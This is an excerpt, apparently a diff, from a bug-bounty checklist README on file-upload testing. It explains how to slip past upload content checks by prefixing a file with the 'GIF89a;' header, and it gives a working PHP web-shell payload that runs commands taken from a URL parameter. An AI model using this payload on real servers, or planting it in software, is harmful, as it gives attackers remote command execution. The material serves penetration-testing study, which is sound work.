0xmaximus/Galaxy-Bugbounty-Checklist/File Upload/README.md

             - [ ]  Content Bypass Shell
             - If they check the Content.
 Add the text "GIF89a;" before you shell-code. ( `Content-type: image/gif` )
+            - GIF89a is a GIF file header.
+If uploaded content is being scanned, sometimes the check can be fooled by putting this header item at the top of shellcode:

             ```php
             GIF89a; <?php system($_GET['cmd']); ?>